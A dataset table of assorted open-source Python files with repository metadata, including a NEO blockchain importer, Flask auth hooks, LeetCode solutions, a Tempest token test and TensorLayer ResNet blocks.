| hexsha (stringlengths 40-40) | size (int64 4-1.02M) | ext (stringclasses 8 values) | lang (stringclasses 1 value) | max_stars_repo_path (stringlengths 4-209) | max_stars_repo_name (stringlengths 5-121) | max_stars_repo_head_hexsha (stringlengths 40-40) | max_stars_repo_licenses (listlengths 1-10) | max_stars_count (int64 1-191k ⌀) | max_stars_repo_stars_event_min_datetime (stringlengths 24-24 ⌀) | max_stars_repo_stars_event_max_datetime (stringlengths 24-24 ⌀) | max_issues_repo_path (stringlengths 4-209) | max_issues_repo_name (stringlengths 5-121) | max_issues_repo_head_hexsha (stringlengths 40-40) | max_issues_repo_licenses (listlengths 1-10) | max_issues_count (int64 1-67k ⌀) | max_issues_repo_issues_event_min_datetime (stringlengths 24-24 ⌀) | max_issues_repo_issues_event_max_datetime (stringlengths 24-24 ⌀) | max_forks_repo_path (stringlengths 4-209) | max_forks_repo_name (stringlengths 5-121) | max_forks_repo_head_hexsha (stringlengths 40-40) | max_forks_repo_licenses (listlengths 1-10) | max_forks_count (int64 1-105k ⌀) | max_forks_repo_forks_event_min_datetime (stringlengths 24-24 ⌀) | max_forks_repo_forks_event_max_datetime (stringlengths 24-24 ⌀) | content (stringlengths 4-1.02M) | avg_line_length (float64 1.07-66.1k) | max_line_length (int64 4-266k) | alphanum_fraction (float64 0.01-1) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
21f23ffc26125396585aedb10c499a2d3a11d50b | 3,871 | py | Python | neo/bin/import_blocks.py | nunojusto/neo-python | 1f54bca9d14fa547290f278f0539a4d4b0c13195 | ["MIT"] | null | null | null | neo/bin/import_blocks.py | nunojusto/neo-python | 1f54bca9d14fa547290f278f0539a4d4b0c13195 | ["MIT"] | 1 | 2018-09-26T17:50:24.000Z | 2018-09-26T18:38:42.000Z | neo/bin/import_blocks.py | nunojusto/neo-python | 1f54bca9d14fa547290f278f0539a4d4b0c13195 | ["MIT"] | null | null | null |
#!/usr/bin/env python3
from neo.Core.Blockchain import Blockchain
from neo.Core.Block import Block
from neo.IO.MemoryStream import MemoryStream
from neo.Implementations.Blockchains.LevelDB.LevelDBBlockchain import LevelDBBlockchain
from neo.Settings import settings
from neocore.IO.BinaryReader import BinaryReader
import argparse
import os
import shutil
from tqdm import trange
from prompt_toolkit import prompt
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-m", "--mainnet", action="store_true", default=False,
help="use MainNet instead of the default TestNet")
parser.add_argument("-c", "--config", action="store", help="Use a specific config file")
# Where to store stuff
parser.add_argument("--datadir", action="store",
help="Absolute path to use for database directories")
parser.add_argument("-i", "--input", help="Where the input file lives")
parser.add_argument("-t", "--totalblocks", help="Total blocks to import", type=int)
parser.add_argument("-l", "--logevents", help="Log Smart Contract Events", default=False, action="store_true")
args = parser.parse_args()
if args.mainnet and args.config:
print("Cannot use both --config and --mainnet parameters, please use only one.")
exit(1)
# Setting the datadir must come before setting the network, else the wrong path is checked at net setup.
if args.datadir:
settings.set_data_dir(args.datadir)
# Setup depending on command line arguments. By default, the testnet settings are already loaded.
if args.config:
settings.setup(args.config)
elif args.mainnet:
settings.setup_mainnet()
if args.logevents:
settings.log_smart_contract_events = True
if not args.input:
raise Exception("Please specify an input path")
file_path = args.input
with open(file_path, 'rb') as file_input:
total_blocks = int.from_bytes(file_input.read(4), 'little')
target_dir = os.path.join(settings.DATA_DIR_PATH, settings.LEVELDB_PATH)
notif_target_dir = os.path.join(settings.DATA_DIR_PATH, settings.NOTIFICATION_DB_PATH)
print("Will import %s blocks to %s" % (total_blocks, target_dir))
print("This will overwrite any data currently in %s and %s.\nType 'confirm' to continue" % (target_dir, notif_target_dir))
confirm = prompt("[confirm]> ", is_password=False)
if not confirm == 'confirm':
print("Cancelled operation")
return False
try:
if os.path.exists(target_dir):
shutil.rmtree(target_dir)
if os.path.exists(notif_target_dir):
shutil.rmtree(notif_target_dir)
except Exception as e:
print("Could not remove existing data %s " % e)
return False
# Instantiate the blockchain and subscribe to notifications
blockchain = LevelDBBlockchain(settings.chain_leveldb_path)
Blockchain.RegisterBlockchain(blockchain)
chain = Blockchain.Default()
stream = MemoryStream()
reader = BinaryReader(stream)
block = Block()
for index in trange(total_blocks, desc='Importing Blocks', unit=' Block'):
# set stream data
block_len = int.from_bytes(file_input.read(4), 'little')
reader.stream.write(file_input.read(block_len))
reader.stream.seek(0)
# get block
block.Deserialize(reader)
# add
if block.Index > 0:
chain.AddBlockDirectly(block)
# reset blockheader
block._header = None
# reset stream
reader.stream.Cleanup()
print("Imported %s blocks to %s " % (total_blocks, target_dir))
if __name__ == "__main__":
main()
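# Illustrative invocations (not part of the original file; the dump file name and data
# directory below are hypothetical, the flags match the argparse setup above):
#   python import_blocks.py --mainnet --input chain.acc
#   python import_blocks.py --config custom.json --input chain.acc --datadir /tmp/neo-data --logevents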
| 34.256637 | 130 | 0.65642 |
96df0d61537f12300f6dc9f1b8d875bcc284c758 | 1,080 | py | Python | auth/hooks.py | erwincoumans/LoginServer | dcd407615dbf8bac91f49b4d0c8950a9b39790b4 | ["MIT"] | null | null | null | auth/hooks.py | erwincoumans/LoginServer | dcd407615dbf8bac91f49b4d0c8950a9b39790b4 | ["MIT"] | null | null | null | auth/hooks.py | erwincoumans/LoginServer | dcd407615dbf8bac91f49b4d0c8950a9b39790b4 | ["MIT"] | null | null | null |
from flask import url_for, g, session, redirect, request, abort
from auth import app
from auth.models import User
import functools
import urllib.parse as urlparse
def static(path):
root = app.config.get('STATIC_ROOT')
if root is None:
return url_for('static', filename=path)
else:
return urlparse.urljoin(root, path)
@app.context_processor
def context_processor():
return dict(static=static)
@app.before_request
def before_request():
try:
g.user = User.query.filter_by(username=session['username']).first()
except Exception:
g.user = None
def login_required(f):
@functools.wraps(f)
def decorated_function(*args, **kwargs):
if g.user is None:
return redirect(url_for('index', next=request.url))
return f(*args, **kwargs)
return decorated_function
def admin_required(f):
@functools.wraps(f)
def decorated_function(*args, **kwargs):
if g.user and g.user.admin:
return f(*args, **kwargs)
else:
abort(403)
return decorated_function
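# Illustrative use of the decorators above (route and field names are hypothetical):
#   @app.route('/dashboard')
#   @login_required
#   def dashboard():
#       return 'hello %s' % g.user.username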
| 26.341463 | 75 | 0.664815 |
5352944e07f64608333d7cf9ffaada9b2294ff04 | 2,780 | py | Python | Widen/LC958_Check_Completeness_of_a_Binary_Tree.py | crazywiden/Leetcode_daily_submit | 15637e260ab547022ac0c828dd196337bd8d50a3 | ["MIT"] | null | null | null | Widen/LC958_Check_Completeness_of_a_Binary_Tree.py | crazywiden/Leetcode_daily_submit | 15637e260ab547022ac0c828dd196337bd8d50a3 | ["MIT"] | null | null | null | Widen/LC958_Check_Completeness_of_a_Binary_Tree.py | crazywiden/Leetcode_daily_submit | 15637e260ab547022ac0c828dd196337bd8d50a3 | ["MIT"] | null | null | null |
"""
958. Check Completeness of a Binary Tree
Given a binary tree, determine if it is a complete binary tree.
Definition of a complete binary tree from Wikipedia:
In a complete binary tree every level, except possibly the last, is completely filled, and all nodes in the last level are as far left as possible. It can have between 1 and 2^h nodes inclusive at the last level h.
Example 1:
Input: [1,2,3,4,5,6]
Output: true
Explanation: Every level before the last is full (ie. levels with node-values {1} and {2, 3}), and all nodes in the last level ({4, 5, 6}) are as far left as possible.
"""
# method1
# define a complete node as: has both left and right child
# for a complete binary tree, we can't have an incomplete node before a complete node
# Runtime: 24 ms, faster than 98.76% of Python3 online submissions for Check Completeness of a Binary Tree.
# Memory Usage: 12.8 MB, less than 100.00% of Python3 online submissions for Check Completeness of a Binary Tree.
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def isCompleteTree(self, root: TreeNode) -> bool:
if root == None:
return True
is_seen_incomplete = False
queue = [root]
while len(queue) > 0:
tmp = queue.pop(0)
if tmp.left != None:
if is_seen_incomplete:
return False
queue.append(tmp.left)
else:
is_seen_incomplete = True
if tmp.right != None:
if is_seen_incomplete:
return False
queue.append(tmp.right)
else:
is_seen_incomplete = True
return True
# method2
# for a complete binary tree, every node's index must be smaller than the number of nodes seen so far,
# where the index of left child of each node should be 2*index + 1
# the index of right child of each node should be 2*index + 2
# Runtime: 36 ms, faster than 42.91% of Python3 online submissions for Check Completeness of a Binary Tree.
# Memory Usage: 12.7 MB, less than 100.00% of Python3 online submissions for Check Completeness of a Binary Tree.
class Solution:
def isCompleteTree(self, root: TreeNode) -> bool:
if root == None:
return True
index = 0
num_node = 0
queue = [(root, index)]
while queue:
tmp, index = queue.pop(0)
if tmp:
num_node += 1
if index >= num_node:
return False
queue.append((tmp.left, 2*index+1))
queue.append((tmp.right, 2*index+2))
return True
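# Quick sanity check for either solution (illustrative, not part of the original submission):
#   root = TreeNode(1); root.left = TreeNode(2); root.right = TreeNode(3)
#   root.left.left = TreeNode(4)
#   Solution().isCompleteTree(root)   # -> True, levels fill left to right
#   root.right.right = TreeNode(7)    # right child present while its left sibling is missing
#   Solution().isCompleteTree(root)   # -> False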
| 36.103896 | 213 | 0.611511 |
cbba66f6c2633a18f31f29e4866576f2b41fcb70 | 1,438 | py | Python | setup.py | Mohammed-bjj/python-midi | 45a44164b2e612e0733326a0fb64ef632b4295de | ["MIT"] | null | null | null | setup.py | Mohammed-bjj/python-midi | 45a44164b2e612e0733326a0fb64ef632b4295de | ["MIT"] | null | null | null | setup.py | Mohammed-bjj/python-midi | 45a44164b2e612e0733326a0fb64ef632b4295de | ["MIT"] | null | null | null |
#!/usr/bin/env python
from distutils.core import setup, Extension
__base__ = {
'name': 'midi',
'version': 'v0.2.3',
'description': 'Python MIDI API',
'author': 'giles hall',
'author_email': 'ghall@csh.rit.edu',
'package_dir': {'midi':'src'},
'py_modules': ['midi.containers', 'midi.__init__', 'midi.events', 'midi.util', 'midi.fileio', 'midi.constants'],
'ext_modules': [],
'ext_package': '',
'scripts': ['scripts/mididump.py', 'scripts/mididumphw.py', 'scripts/midiplay.py'],
}
def setup_alsa(ns):
srclist = ["src/sequencer_alsa/sequencer_alsa.i"]
extns = {
'libraries': ['asound'],
#'extra_compile_args':['-DSWIGRUNTIME_DEBUG']
}
ext = Extension('_sequencer_alsa', srclist, **extns)
ns['ext_modules'].append(ext)
ns['package_dir']['midi.sequencer'] = 'src/sequencer_alsa'
ns['py_modules'].append('midi.sequencer.__init__')
ns['py_modules'].append('midi.sequencer.sequencer')
ns['py_modules'].append('midi.sequencer.sequencer_alsa')
ns['ext_package'] = 'midi.sequencer'
def configure_platform():
from sys import platform
ns = __base__.copy()
# currently, only the ALSA sequencer is supported
if platform.startswith('linux'):
setup_alsa(ns)
pass
else:
print("No sequencer available for '%s' platform." % platform)
return ns
if __name__ == "__main__":
setup(**configure_platform())
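# Illustrative usage of this distutils script (standard distutils commands):
#   python setup.py build
#   python setup.py install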
| 29.958333 | 116 | 0.639777 |
7c58f6463e24ec2ecf548a9e3a2723f59c3c8df9 | 1,318 | py | Python | ExeSysMain/ExeSysFunctionalModules/ExeSysFunc/exe_sys_web_admin_func.py | alessandror/ExeSys-Python | a6c60577ff0024f90646ab37e2601288950fe734 | ["MIT"] | null | null | null | ExeSysMain/ExeSysFunctionalModules/ExeSysFunc/exe_sys_web_admin_func.py | alessandror/ExeSys-Python | a6c60577ff0024f90646ab37e2601288950fe734 | ["MIT"] | null | null | null | ExeSysMain/ExeSysFunctionalModules/ExeSysFunc/exe_sys_web_admin_func.py | alessandror/ExeSys-Python | a6c60577ff0024f90646ab37e2601288950fe734 | ["MIT"] | null | null | null |
"""
Copyright 2018 Alex Redaelli <a.redaelli at gmail dot com>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy,
modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
#-*- coding: utf-8 -*-
import redis
def test_web_cmd(data_to_process):
resp = {}
#print "test function with data %s" % data_to_process
resp['EOJ'] = data_to_process
resp['type'] = 'redis'
return resp
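# Illustrative call (the payload value is hypothetical):
#   test_web_cmd('ping')  # -> {'EOJ': 'ping', 'type': 'redis'}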
| 48.814815 | 126 | 0.769347 |
8915e2ec57c3403bef585dd5e9dd2d18fee3421d | 2,798 | py | Python | code/submission.py | enricogherardi/U-Net-with-Dice-Loss-for-Multiclass-Instance-Segmentation | b7f14d947764c92f6d5f5a37ea6fa1d626279121 | ["MIT"] | null | null | null | code/submission.py | enricogherardi/U-Net-with-Dice-Loss-for-Multiclass-Instance-Segmentation | b7f14d947764c92f6d5f5a37ea6fa1d626279121 | ["MIT"] | null | null | null | code/submission.py | enricogherardi/U-Net-with-Dice-Loss-for-Multiclass-Instance-Segmentation | b7f14d947764c92f6d5f5a37ea6fa1d626279121 | ["MIT"] | null | null | null |
import os
import tensorflow as tf
import numpy as np
from PIL import Image
import json
# Set the seed to replicate the experiments
SEED = 1234
tf.random.set_seed(SEED)
print("Start Submitting...\n\n\n")
# Setting up all the previous variables
img_h = 1536
img_w = img_h
def meanIoU(y_true, y_pred):
# get predicted class from softmax
y_pred = tf.expand_dims(tf.argmax(y_pred, -1), -1)
per_class_iou = []
for i in range(1,3): # exclude the background class 0
# Get prediction and target related to only a single class (i)
class_pred = tf.cast(tf.where(y_pred == i, 1, 0), tf.float32)
class_true = tf.cast(tf.where(y_true == i, 1, 0), tf.float32)
intersection = tf.reduce_sum(class_true * class_pred)
union = tf.reduce_sum(class_true) + tf.reduce_sum(class_pred) - intersection
iou = (intersection + 1e-7) / (union + 1e-7)
per_class_iou.append(iou)
return tf.reduce_mean(per_class_iou)
from keras import backend as K
def dice_coef_multi(y_true, y_pred, smooth=1e-7):
y_true_f = K.flatten(K.one_hot(K.cast(y_true, 'int32'), num_classes=3)[...,1:])
y_pred_f = K.flatten(y_pred[...,1:])
intersect = K.sum(y_true_f * y_pred_f, axis=-1)
denom = K.sum(y_true_f + y_pred_f, axis=-1)
return K.mean((2. * intersect / (denom + smooth)))
def dice_coef_loss_multi(y_true, y_pred):
return 1 - dice_coef_multi(y_true, y_pred)
def rle_encode(img):
'''
img: numpy array, 1 - foreground, 0 - background
Returns run length as string formatted
'''
pixels = img.flatten()
pixels = np.concatenate([[0], pixels, [0]])
runs = np.where(pixels[1:] != pixels[:-1])[0] + 1
runs[1::2] -= runs[::2]
return ' '.join(str(x) for x in runs)
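# Worked example (illustrative): for a 2x4 mask [[0, 1, 1, 0], [0, 1, 0, 0]] the flattened
# pixels are [0, 1, 1, 0, 0, 1, 0, 0], so rle_encode returns '2 2 6 1', i.e. a run of
# length 2 starting at (1-based) pixel 2 and a run of length 1 starting at pixel 6.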
def create_json(img, img_name, team, crop, file_path):
# Creating the dict
submission_dict = {}
submission_dict[img_name] = {}
submission_dict[img_name]['shape'] = img.shape
submission_dict[img_name]['team'] = team
submission_dict[img_name]['crop'] = crop
submission_dict[img_name]['segmentation'] = {}
    #RLE encoding (the mask passed in as `img` is assumed to hold class labels: 1 = crop, 2 = weed)
    # crop
    rle_encoded_crop = rle_encode(img == 1)
    # weed
    rle_encoded_weed = rle_encode(img == 2)
submission_dict[img_name]['segmentation']['crop'] = rle_encoded_crop
submission_dict[img_name]['segmentation']['weed'] = rle_encoded_weed
# Please notice that in this example we have a single prediction.
# For the competition you have to provide segmentation for each of
# the test images.
# Finally, save the results into the submission.json file
with open(file_path, 'a') as f:
json.dump(submission_dict, f)
# Load the model
model = tf.keras.models.load_model("/content/drive/MyDrive/cp_24.ckpt", custom_objects={'meanIoU':meanIoU})#, 'dice_coef_loss_multi': dice_coef_loss_multi})
| 34.121951 | 156 | 0.688706 |
6b34288364291b9136f748b670813d67205bf33e | 903 | py | Python | mysite/my_calendar/models.py | jared-wallace/jared-wallace.com | af58635d18f394906b6a0125eb4573f89546d7d5 | ["WTFPL"] | null | null | null | mysite/my_calendar/models.py | jared-wallace/jared-wallace.com | af58635d18f394906b6a0125eb4573f89546d7d5 | ["WTFPL"] | null | null | null | mysite/my_calendar/models.py | jared-wallace/jared-wallace.com | af58635d18f394906b6a0125eb4573f89546d7d5 | ["WTFPL"] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
class Entry(models.Model):
title = models.CharField(max_length=40)
snippet = models.CharField(max_length=150, blank=True)
body = models.TextField(max_length=10000, blank=True)
created = models.DateTimeField(auto_now_add=True)
date = models.DateField(blank=True)
creator = models.ForeignKey(User, blank=True, null=True)
remind = models.BooleanField(default=False)
def __unicode__(self):
if self.title:
return unicode(self.creator) + u" - " + self.title
else:
return unicode(self.creator) + u" - " + self.snippet[:40]
def short(self):
if self.snippet:
return "<i>%s</i> - %s" % (self.title, self.snippet)
else:
return self.title
short.allow_tags = True
class Meta:
verbose_name_plural = "entries"
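# Illustrative usage (field values are hypothetical):
#   e = Entry(title='Dentist', snippet='2pm appointment')
#   e.short()  # -> '<i>Dentist</i> - 2pm appointment'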
| 33.444444 | 69 | 0.646733 |
7fec28d6002e5dcfe869d14f32c79e83574487da | 5,037 | py | Python | tempest/api/identity/admin/test_tokens.py | NetApp/tempest | dd86b1517ec5ac16c26975ed0ce0d8b7ddcac6cc | ["Apache-2.0"] | null | null | null | tempest/api/identity/admin/test_tokens.py | NetApp/tempest | dd86b1517ec5ac16c26975ed0ce0d8b7ddcac6cc | ["Apache-2.0"] | null | null | null | tempest/api/identity/admin/test_tokens.py | NetApp/tempest | dd86b1517ec5ac16c26975ed0ce0d8b7ddcac6cc | ["Apache-2.0"] | null | null | null |
# Copyright 2013 Huawei Technologies Co.,LTD.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.identity import base
from tempest.common.utils import data_utils
from tempest.test import attr
class TokensTestJSON(base.BaseIdentityV2AdminTest):
_interface = 'json'
@attr(type='gate')
def test_create_get_delete_token(self):
# get a token by username and password
user_name = data_utils.rand_name(name='user-')
user_password = data_utils.rand_name(name='pass-')
# first:create a tenant
tenant_name = data_utils.rand_name(name='tenant-')
resp, tenant = self.client.create_tenant(tenant_name)
self.assertEqual(200, resp.status)
self.data.tenants.append(tenant)
# second:create a user
resp, user = self.client.create_user(user_name, user_password,
tenant['id'], '')
self.assertEqual(200, resp.status)
self.data.users.append(user)
# then get a token for the user
rsp, body = self.token_client.auth(user_name,
user_password,
tenant['name'])
self.assertEqual(rsp['status'], '200')
self.assertEqual(body['token']['tenant']['name'],
tenant['name'])
# Perform GET Token
token_id = body['token']['id']
resp, token_details = self.client.get_token(token_id)
self.assertEqual(resp['status'], '200')
self.assertEqual(token_id, token_details['token']['id'])
self.assertEqual(user['id'], token_details['user']['id'])
self.assertEqual(user_name, token_details['user']['name'])
self.assertEqual(tenant['name'],
token_details['token']['tenant']['name'])
# then delete the token
resp, body = self.client.delete_token(token_id)
self.assertEqual(resp['status'], '204')
@attr(type='gate')
def test_rescope_token(self):
"""An unscoped token can be requested, that token can be used to
request a scoped token.
"""
# Create a user.
user_name = data_utils.rand_name(name='user-')
user_password = data_utils.rand_name(name='pass-')
tenant_id = None # No default tenant so will get unscoped token.
email = ''
resp, user = self.client.create_user(user_name, user_password,
tenant_id, email)
self.assertEqual(200, resp.status)
self.data.users.append(user)
# Create a couple tenants.
tenant1_name = data_utils.rand_name(name='tenant-')
resp, tenant1 = self.client.create_tenant(tenant1_name)
self.assertEqual(200, resp.status)
self.data.tenants.append(tenant1)
tenant2_name = data_utils.rand_name(name='tenant-')
resp, tenant2 = self.client.create_tenant(tenant2_name)
self.assertEqual(200, resp.status)
self.data.tenants.append(tenant2)
# Create a role
role_name = data_utils.rand_name(name='role-')
resp, role = self.client.create_role(role_name)
self.assertEqual(200, resp.status)
self.data.roles.append(role)
# Grant the user the role on the tenants.
resp, _ = self.client.assign_user_role(tenant1['id'], user['id'],
role['id'])
self.assertEqual(200, resp.status)
resp, _ = self.client.assign_user_role(tenant2['id'], user['id'],
role['id'])
self.assertEqual(200, resp.status)
# Get an unscoped token.
        rsp, body = self.token_client.auth(user_name, user_password)
        self.assertEqual(rsp['status'], '200')
token_id = body['token']['id']
# Use the unscoped token to get a token scoped to tenant1
        rsp, body = self.token_client.auth_token(token_id, tenant=tenant1_name)
        self.assertEqual(rsp['status'], '200')
scoped_token_id = body['token']['id']
# Revoke the scoped token
resp, body = self.client.delete_token(scoped_token_id)
self.assertEqual(204, resp.status)
# Use the unscoped token to get a token scoped to tenant2
        rsp, body = self.token_client.auth_token(token_id, tenant=tenant2_name)
        self.assertEqual(rsp['status'], '200')
class TokensTestXML(TokensTestJSON):
_interface = 'xml'
| 40.620968 | 79 | 0.620012 |
9a72af1b0e58c4570f089df771d034d5d3303336 | 3,014 | py | Python | ambari-server/src/main/resources/stacks/HDP/2.1.GlusterFS/services/FALCON/package/scripts/falcon.py | fangxingli/mambari | 6da9f6090d4d42623529b73413c8feb8b7f6fe45 | ["Apache-2.0", "MIT"] | 1 | 2021-05-06T06:24:04.000Z | 2021-05-06T06:24:04.000Z | ambari-server/src/main/resources/stacks/HDP/2.1.GlusterFS/services/FALCON/package/scripts/falcon.py | fangxingli/mambari | 6da9f6090d4d42623529b73413c8feb8b7f6fe45 | ["Apache-2.0", "MIT"] | null | null | null | ambari-server/src/main/resources/stacks/HDP/2.1.GlusterFS/services/FALCON/package/scripts/falcon.py | fangxingli/mambari | 6da9f6090d4d42623529b73413c8feb8b7f6fe45 | ["Apache-2.0", "MIT"] | 3 | 2017-10-31T11:42:31.000Z | 2021-04-26T07:17:53.000Z |
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from resource_management import *
def falcon(type, action = None):
import params
if action == 'config':
Directory(params.falcon_pid_dir,
owner=params.falcon_user
)
Directory(params.falcon_log_dir,
owner=params.falcon_user
)
Directory(params.falcon_webapp_dir,
owner=params.falcon_user
)
Directory(params.falcon_home,
owner=params.falcon_user
)
File(params.falcon_conf_dir + '/falcon-env.sh',
content=Template('falcon-env.sh.j2')
)
File(params.falcon_conf_dir + '/client.properties',
content=Template('client.properties.j2'),
mode=0644
)
PropertiesFile(params.falcon_conf_dir + '/runtime.properties',
properties=params.falcon_runtime_properties,
mode=0644
)
PropertiesFile(params.falcon_conf_dir + '/startup.properties',
properties=params.falcon_startup_properties,
mode=0644
)
if type == 'server':
if action == 'config':
if params.store_uri[0:4] == "hdfs":
params.HdfsDirectory(params.store_uri,
action="create_delayed",
owner=params.falcon_user,
mode=0755
)
params.HdfsDirectory(params.flacon_apps_dir,
action="create_delayed",
owner=params.falcon_user,
mode=0777#TODO change to proper mode
)
params.HdfsDirectory(None, action="create")
Directory(params.falcon_local_dir,
owner=params.falcon_user,
create_parents = True
)
if params.falcon_embeddedmq_enabled == True:
Directory(params.falcon_embeddedmq_data,
owner=params.falcon_user,
create_parents = True
)
if action == 'start':
Execute(format('{falcon_home}/bin/falcon-start -port {falcon_port}'),
user=params.falcon_user
)
if action == 'stop':
Execute(format('{falcon_home}/bin/falcon-stop'),
user=params.falcon_user
)
File(params.server_pid_file,
action='delete'
)
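# Illustrative calls (assuming the usual Ambari client/server wrapper scripts; the
# 'client' type string is a guess, only 'server' is special-cased above):
#   falcon('client', action='config')
#   falcon('server', action='start')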
| 34.643678 | 75 | 0.629064 |
9b50eaa4a46724ff66fe75bcc58b1d0b6773969e | 782 | py | Python | scripts/json_parser/category-pic-gen.py | Rinsightproject/RINSIGHT | db4ce2635998e71dcef84d182c9b31375b8d31b9 | ["Apache-2.0"] | null | null | null | scripts/json_parser/category-pic-gen.py | Rinsightproject/RINSIGHT | db4ce2635998e71dcef84d182c9b31375b8d31b9 | ["Apache-2.0"] | null | null | null | scripts/json_parser/category-pic-gen.py | Rinsightproject/RINSIGHT | db4ce2635998e71dcef84d182c9b31375b8d31b9 | ["Apache-2.0"] | null | null | null |
import os
import sys
def get_project_root():
cwd_list = os.getcwd().split('/')
need_path_list = []
for item in cwd_list:
need_path_list.append(item)
if item == 'rust-up-to-you':
break
return '/'.join(need_path_list)
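# Example (hypothetical path): if os.getcwd() is '/home/user/rust-up-to-you/scripts/json_parser',
# get_project_root() returns '/home/user/rust-up-to-you'.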
if __name__ == '__main__':
project_root = get_project_root()
json_output_path = project_root + '/data/json/category.json'
pic_output_path = project_root + '/data/pic/category.jpg'
top_n = 15
if len(sys.argv) > 1:
top_n = sys.argv[1]
os.system("python3 "+project_root+"/scripts/json_parser/category.py "+str(top_n) \
+" > "+json_output_path)
os.system("python3 "+project_root+"/scripts/draw_bar/draw_category_bar.py "+\
json_output_path+" "+pic_output_path)
| 26.066667 | 86 | 0.640665 |
458f2591240a00da81dc5b16f23777a17cfc5696 | 6,871 | py | Python | tensorlayer/models/resnet.py | Howdy-Personally/tensorlayer-master | bb92e4e187419d5e7ded8331d5c7cbf5615ee744 | ["Apache-2.0"] | 4,484 | 2017-12-27T03:28:35.000Z | 2021-12-02T14:42:58.000Z | tensorlayer/models/resnet.py | Howdy-Personally/tensorlayer-master | bb92e4e187419d5e7ded8331d5c7cbf5615ee744 | ["Apache-2.0"] | 549 | 2017-12-28T07:19:52.000Z | 2021-11-05T02:34:20.000Z | tensorlayer/models/resnet.py | Howdy-Personally/tensorlayer-master | bb92e4e187419d5e7ded8331d5c7cbf5615ee744 | ["Apache-2.0"] | 1,076 | 2017-12-27T12:25:46.000Z | 2021-11-24T09:12:36.000Z |
#! /usr/bin/python
# -*- coding: utf-8 -*-
"""ResNet for ImageNet.
# Reference:
- [Deep Residual Learning for Image Recognition](
https://arxiv.org/abs/1512.03385) (CVPR 2016 Best Paper Award)
"""
import os
import tensorflow as tf
from tensorlayer import logging
from tensorlayer.files import (assign_weights, load_npz, maybe_download_and_extract)
from tensorlayer.layers import (BatchNorm, Conv2d, Dense, Elementwise, GlobalMeanPool2d, Input, MaxPool2d)
from tensorlayer.models import Model
__all__ = [
'ResNet50',
]
def identity_block(input, kernel_size, n_filters, stage, block):
"""The identity block where there is no conv layer at shortcut.
Parameters
----------
input : tf tensor
Input tensor from above layer.
kernel_size : int
The kernel size of middle conv layer at main path.
n_filters : list of integers
The numbers of filters for 3 conv layer at main path.
stage : int
Current stage label.
block : str
Current block label.
Returns
-------
Output tensor of this block.
"""
filters1, filters2, filters3 = n_filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = Conv2d(filters1, (1, 1), W_init=tf.initializers.he_normal(), name=conv_name_base + '2a')(input)
x = BatchNorm(name=bn_name_base + '2a', act='relu')(x)
ks = (kernel_size, kernel_size)
x = Conv2d(filters2, ks, padding='SAME', W_init=tf.initializers.he_normal(), name=conv_name_base + '2b')(x)
x = BatchNorm(name=bn_name_base + '2b', act='relu')(x)
x = Conv2d(filters3, (1, 1), W_init=tf.initializers.he_normal(), name=conv_name_base + '2c')(x)
x = BatchNorm(name=bn_name_base + '2c')(x)
x = Elementwise(tf.add, act='relu')([x, input])
return x
def conv_block(input, kernel_size, n_filters, stage, block, strides=(2, 2)):
"""The conv block where there is a conv layer at shortcut.
Parameters
----------
input : tf tensor
Input tensor from above layer.
kernel_size : int
The kernel size of middle conv layer at main path.
n_filters : list of integers
The numbers of filters for 3 conv layer at main path.
stage : int
Current stage label.
block : str
Current block label.
strides : tuple
Strides for the first conv layer in the block.
Returns
-------
Output tensor of this block.
"""
filters1, filters2, filters3 = n_filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = Conv2d(filters1, (1, 1), strides=strides, W_init=tf.initializers.he_normal(), name=conv_name_base + '2a')(input)
x = BatchNorm(name=bn_name_base + '2a', act='relu')(x)
ks = (kernel_size, kernel_size)
x = Conv2d(filters2, ks, padding='SAME', W_init=tf.initializers.he_normal(), name=conv_name_base + '2b')(x)
x = BatchNorm(name=bn_name_base + '2b', act='relu')(x)
x = Conv2d(filters3, (1, 1), W_init=tf.initializers.he_normal(), name=conv_name_base + '2c')(x)
x = BatchNorm(name=bn_name_base + '2c')(x)
shortcut = Conv2d(filters3, (1, 1), strides=strides, W_init=tf.initializers.he_normal(),
name=conv_name_base + '1')(input)
shortcut = BatchNorm(name=bn_name_base + '1')(shortcut)
x = Elementwise(tf.add, act='relu')([x, shortcut])
return x
